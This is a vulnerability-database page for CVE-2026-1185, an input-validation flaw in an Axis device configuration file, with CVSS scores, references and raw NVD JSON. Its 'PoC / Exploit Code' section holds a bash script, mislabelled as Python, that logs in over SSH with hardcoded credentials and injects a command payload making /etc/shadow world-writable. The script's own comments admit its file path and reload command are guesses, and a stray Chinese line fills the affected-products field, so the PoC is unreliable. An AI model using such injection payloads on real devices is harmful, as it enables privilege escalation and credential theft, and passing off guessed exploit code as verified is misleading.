CVE-2026-1185

Description

A configuration file on the local file system had improper input validation which could allow code execution and potentially lead to privilege escalation. This vulnerability can only be exploited if an attacker can log in to the Axis device using SSH.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

未在提供文本中明确列出，请参考官方Axis安全公告

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# PoC for CVE-2026-1185
# Description: Exploits improper input validation in a configuration file
# on an Axis device to achieve code execution and privilege escalation.
# Preconditions: Attacker has valid SSH credentials (low privilege).

TARGET="192.168.1.10"
USER="service"
PASS="password123"
CONFIG_FILE="/etc/axis/vulnerable_config.conf"
PAYLOAD="; /bin/chmod 777 /etc/shadow; #" # Malicious command to inject

echo "[*] Attempting to exploit CVE-2026-1185 on $TARGET"

# 1. Connect via SSH and inject payload into the configuration file
# We assume the config file is writable by the low-priv user or group
sshpass -p "$PASS" ssh -o StrictHostKeyChecking=no "$USER@$TARGET" \
    "echo 'setting_name=$PAYLOAD' >> $CONFIG_FILE"

if [ $? -eq 0 ]; then
    echo "[+] Payload injected successfully."
else
    echo "[-] Failed to inject payload."
    exit 1
fi

# 2. Trigger configuration reload
# This simulates the system reading the malicious config
# In a real scenario, this might be 'systemctl restart axis-service' or similar
sshpass -p "$PASS" ssh "$USER@$TARGET" "/usr/bin/axis-config-reload"

echo "[*] Waiting for service reload..."
sleep 5

# 3. Verify exploit (Check if shadow file permissions changed)
sshpass -p "$PASS" ssh "$USER@$TARGET" "ls -l /etc/shadow"

echo "[*] Exploit demonstration complete."

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1185
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1185
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1185/
[4] VulDB https://vuldb.com/cve/CVE-2026-1185
[5] https://www.axis.com/dam/public/69/df/8d/cve-2026-1185pdf-en-US-530733.pdf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1185", "sourceIdentifier": "[email protected]", "published": "2026-05-12T07:16:09.720", "lastModified": "2026-05-12T07:16:09.720", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A configuration file on the local file system had improper input validation which could allow code execution and potentially lead to privilege escalation. This vulnerability can only be exploited if an attacker can log in to the Axis device using SSH."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "references": [{"url": "https://www.axis.com/dam/public/69/df/8d/cve-2026-1185pdf-en-US-530733.pdf", "source": "[email protected]"}]}}